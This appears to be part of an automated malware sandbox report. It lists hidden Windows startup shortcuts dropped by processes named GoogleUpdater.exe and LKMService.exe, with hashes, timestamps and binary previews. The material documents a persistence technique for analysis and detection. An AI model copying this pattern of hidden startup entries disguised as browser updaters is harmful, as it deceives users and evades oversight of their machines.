                                                                                                                                                                                                                                          Preview:L..................F...."...${........L..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d0ecb11db6f242d7aa67790316d0e505.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:54 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957595532992399
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8WCsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8WCsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:25A8487040E21BF9257B5C2C5C47DBB1
                                                                                                                                                                                                                                          SHA1:0444E4D677BA4EE3FA218F9D71BCAB8683295727
                                                                                                                                                                                                                                          SHA-256:9E445C4D624F07BC17DFA5A2E75B2BFCD9A9E1FB626E7C462BABDDF2B1447406
                                                                                                                                                                                                                                          SHA-512:69BAEEBF13E21E641899117A2F1F33FC17483B7373F2E6BF784DA30CE1FB383BBE5649F33ABD665354F034CC12864052631A32D16F1FD472DAB64AC712288B09
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4990009ee12483c925ae51afb3a5d2d.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:09 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.966951093535993
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8xsDYlXPXv+RrgKPj/jiSAzav/42eEFsuqygm:8xsDYlf2RT7sevgosryg
                                                                                                                                                                                                                                          MD5:2610886B1F32321A1EECA778C51FB16A
                                                                                                                                                                                                                                          SHA1:3D1E783084E0A67BEF02D5B581CAB906D170DBBC
                                                                                                                                                                                                                                          SHA-256:DC964D18D805BF990587F44F6BA18F1CF7F20B3181751370DCDDB70604E49021
                                                                                                                                                                                                                                          SHA-512:DE782AC7D29DAF8ABCE2ACCEC646F897C7131BEE4B44D8F77DF58AE85610DDEF075B2506E5013B49DCC130272850EF89E85EB88E28CCE1FA00153516403EA039
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......z\..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................8..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4d48885a01b48b1b10cf800b9243bfb.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:40 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.960536410579371
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8pjsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8ZsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:9967D9729460C3D188F89792C05CB47E
                                                                                                                                                                                                                                          SHA1:ADC0C5E49C08F22D73B35D460BE2B240276E43D9
                                                                                                                                                                                                                                          SHA-256:E2DFA4CECFFC647321F7C8669D4D47D1534CDD7BE670D19469AFE2CB9AC8EB5A
                                                                                                                                                                                                                                          SHA-512:7F26597DBA4A771F88F916B7C8A8372537CD318CAF8BA5368F1B8C93556C98FAC78DD6B969631CFF4E633DAE5E4E0E2EF80F62721B89F9FC2006BC00C1A5E7D6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......kQ..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9b4a643bafa4bc7a2041b7b9bd6d870.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:38 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956017836880507
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8HSDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8HSDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:F246E9F159B31F840089DAE92EF033CE
                                                                                                                                                                                                                                          SHA1:C746BC99790BDAA58C8A551B622A33AEC1C13A61
                                                                                                                                                                                                                                          SHA-256:0170211B77BFF3FA383EE0ECD3AF8408B8E1745EC1D517552D3AB4C9358569B8
                                                                                                                                                                                                                                          SHA-512:246C5941483A26568D51C72E9B2510373F96D89D5B7B97CAEEA14608561BBE95FB44820E24767E1099E305D36E52C46B5D3121B9BD1BBEC526BB586F0335A078
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......r...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......,..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_da692d66d16e43e98f159af92d7ca084.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:49 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958852908895869
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8EsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8EsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:54E5F6F51139B36AD6FA2358D237A16B
                                                                                                                                                                                                                                          SHA1:260B88C357FCC7BD7F5FB52B6450302BCCB8B2DE
                                                                                                                                                                                                                                          SHA-256:1EEC42234ED8EB9DDF5CFE6702D14D14069699139AF19D2A3831BD1B19D2C17B
                                                                                                                                                                                                                                          SHA-512:A6EB6B54203E524D5EC77B9D6D4789E070BF979604E6BB1563DB1D4871AF5EAC279F587747E6BF39A6E44C9F9D8D22A5D8E72933F26338FBF067AC9568ADF96A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......z...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dc24401338dd4828b0012a71af1e6767.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:41 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957804834402742
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8FsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8FsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:ABE462CD03A86D6A72956C8B6FF5360D
                                                                                                                                                                                                                                          SHA1:0E94C3B4640F08D3E50F63638D27FAD2202A4415
                                                                                                                                                                                                                                          SHA-256:703529A9605D22934494E3B8FEB0A7B484BFF47D3AFEB8EF8057355CF0509885
                                                                                                                                                                                                                                          SHA-512:41F5CE09171134F7E6DCF870A59CD1C9DF11AAB5ED932501647AFBAD958DE87ACFA948834FC8096282E6691C675A0477B0F1A61F21F1A72B6ED9810F1BF1AD19
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......v...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dcd7a5988682499dbe1e228e9be6f91e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:02 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9574979926715965
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8rjsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8rjsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:EB001B50568C5C65C487897D2EF11AC5
                                                                                                                                                                                                                                          SHA1:765B294C78D38E9F96FE2693667F68224BB46D58
                                                                                                                                                                                                                                          SHA-256:16DECA22EC6F542450ABCCA3794164C71A9E21AAAC413CA42A886857A7DCB0AB
                                                                                                                                                                                                                                          SHA-512:2700B1FD1634BFB9B3A6B0830429AF482FD283E6F1F6D85B1A0A24675440B50290EF65DAE9690350E86AC5D8F422D598844BE9963DD48439221C51F1D95BCDAE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......:...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e2a898970d994bc8b1a1171ad357b707.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:07 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.96491972465667
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8wsDYlXPXv+RjmPgKtj/jiSAzav/42eEFsuqygm:8wsDYlf2RjE7sevgosryg
                                                                                                                                                                                                                                          MD5:111A3B9EF766AE858DDE8374384C63E7
                                                                                                                                                                                                                                          SHA1:B23378A240225BEB455CC42E73B1CC6A64A31AC8
                                                                                                                                                                                                                                          SHA-256:0671F4011381B176E77EB853256289B6CF7DE8E81852CF697F4705A877CDCC82
                                                                                                                                                                                                                                          SHA-512:7787FE41458B22FB067A0C6FC4E356A07F8070D18E83EEBE775BE60F7CA1E3DBC030D9CBDA10582C747AD3B650DEDF4F7AF3BD45F20F8B3D763DFF94D38016B6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................y+.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4cf168250ea4406a6a1577cb51c9ce2.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:01 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.94803240976096
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8A7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8AoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:0F97A2A2648290AB32BCA5B55AA691CC
                                                                                                                                                                                                                                          SHA1:9893C919A487F1EB8E59E44930E7AC657BFA9EC7
                                                                                                                                                                                                                                          SHA-256:BDF06D9FFD1058E296C4B400B323451FF72ED6BD017328C9378A55506F064EFE
                                                                                                                                                                                                                                          SHA-512:14D0838482E1E09E6FEEF14735373D106EED5CEE8B410E1572FD3162B112E08242D2930B50A832B6EB1D1E0DAA18C18A7EF862F7042545F6EF32CE44782E5D65
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......n...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e657ac0296464444873343492714d2aa.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:04 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.968615313482901
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8GsDYlXPXv+RlgKJHj/jiSAzav/42eEFsuqygm:8GsDYlf2R7H7sevgosryg
                                                                                                                                                                                                                                          MD5:6F85C5B483A05862086EC5D84018206B
                                                                                                                                                                                                                                          SHA1:2390D9C11E40E905C0A18CA5DDD07601033D5A73
                                                                                                                                                                                                                                          SHA-256:8A13242B013374FE0375B0C20F268E4BEFBD60CEFAA80B012194285F25221E2C
                                                                                                                                                                                                                                          SHA-512:5A1FBAAC646B7EB24A3BB229A87F41AA25039A8FD05B6C44DEE93CE8B4C10AAA2F6AEE603B89D5DFE323A72B420C233239C177833CC412A21A5A8C0C339FA0EA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................R...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e75d8cdd821b422ab8ef7c290f300f9d.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:37 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.951966338199818
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8iesDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8iesDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:C2A39A66DA819544490C700926B53EF7
                                                                                                                                                                                                                                          SHA1:90F7AB55EAC829A510628C90A561C6A4148E9B62
                                                                                                                                                                                                                                          SHA-256:A131A9DFDF1127E5E4A9A34D764792A07AEE6845C20AF5BE5BFDBC4EA07DC7B9
                                                                                                                                                                                                                                          SHA-512:5223051015933EC19982FADE9A8D3A67091E29476F754D741F1DF3B58589D54281E5EFA81FF7E1D65BFB59CE769F058675AFAF2D0D7A99E5F27D6C22A7ACA9D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
